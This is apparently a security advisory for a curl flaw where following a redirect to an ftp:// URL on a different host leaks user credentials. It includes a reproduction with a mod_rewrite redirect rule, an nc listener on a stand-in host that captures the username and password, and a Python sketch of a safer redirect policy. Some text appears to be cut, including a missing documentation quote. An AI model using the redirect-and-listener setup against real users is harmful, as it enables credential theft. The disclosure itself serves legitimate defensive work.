5.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
33.1%
Curl can be coaxed to leak user credentials to a third-party host by issuing an HTTP redirect to an ftp:// URL.

Set up firstsite.tld to perform the redirect with mod_rewrite:

```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```

Set up secondsite.tld to listen, for example with:

```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```

Then run:

```
curl -L --user foo https://firstsite.tld/redirectpoc
```

The listener on secondsite.tld receives the credentials:

```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```

There are several issues here:
(firstsite.tld vs secondsite.tld). This is definitely not what the user could expect, considering the documentation says:

I believe the credentials should not be sent in this case unless --location-trusted is used.

It might even be sensible to consider making curl stop sending credentials over downgraded security by default even when --location-trusted is used. Maybe there could be some option that could be used to enable such downgrade if the user REALLY wants it.

Impact: Leak of confidential information (user credentials).
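The policy the report argues for (credentials follow a redirect only to the same host with no protocol downgrade, unless the user explicitly trusts the redirect target) can be expressed as a small decision function. The code below is an added illustration and is not curl's implementation; the scheme ranking table and the `allow_downgrade` opt-in are assumptions made for the example.

```python
"""Illustrative redirect credential policy (not curl's code).

Decides whether credentials attached to the original request may be
re-sent to a redirect target, modelling the behaviour the report asks for.
"""
from urllib.parse import urlsplit

# Assumption for this example: rank schemes by transport protection so that
# a redirect to a lower-ranked scheme (e.g. https -> ftp) is a downgrade.
_SCHEME_RANK = {"https": 2, "ftps": 2, "sftp": 2, "http": 1, "ftp": 1}


def is_downgrade(original: str, target: str) -> bool:
    """True if the redirect target uses a weaker transport than the original."""
    orig_rank = _SCHEME_RANK.get(urlsplit(original).scheme.lower(), 0)
    target_rank = _SCHEME_RANK.get(urlsplit(target).scheme.lower(), 0)
    return target_rank < orig_rank


def same_host(original: str, target: str) -> bool:
    """True if both URLs point at the same hostname (port is ignored here)."""
    return urlsplit(original).hostname == urlsplit(target).hostname


def should_send_credentials(original: str, target: str,
                            location_trusted: bool = False,
                            allow_downgrade: bool = False) -> tuple:
    """Return (decision, reason) for forwarding credentials to `target`.

    - Same host and no downgrade: always allowed.
    - Otherwise require --location-trusted.
    - Even with --location-trusted, a protocol downgrade needs the
      (hypothetical) allow_downgrade opt-in the report suggests.
    """
    downgrade = is_downgrade(original, target)
    if same_host(original, target) and not downgrade:
        return True, "same host, no protocol downgrade"
    if not location_trusted:
        return False, "different host or downgrade; --location-trusted not set"
    if downgrade and not allow_downgrade:
        return False, "protocol downgrade; explicit opt-in required"
    return True, "redirect target explicitly trusted"


if __name__ == "__main__":
    # Constructed URLs mirroring the report's reproduction.
    src = "https://firstsite.tld/redirectpoc"
    dst = "ftp://secondsite.tld:9999"
    print(should_send_credentials(src, dst))
    print(should_send_credentials(src, dst, location_trusted=True))
    print(should_send_credentials(src, dst, location_trusted=True,
                                  allow_downgrade=True))
```

Run as a script it prints the three decisions for the report's redirect (denied, denied because of the downgrade, then allowed only with both flags), which is the behaviour the reporter proposes as the safe default.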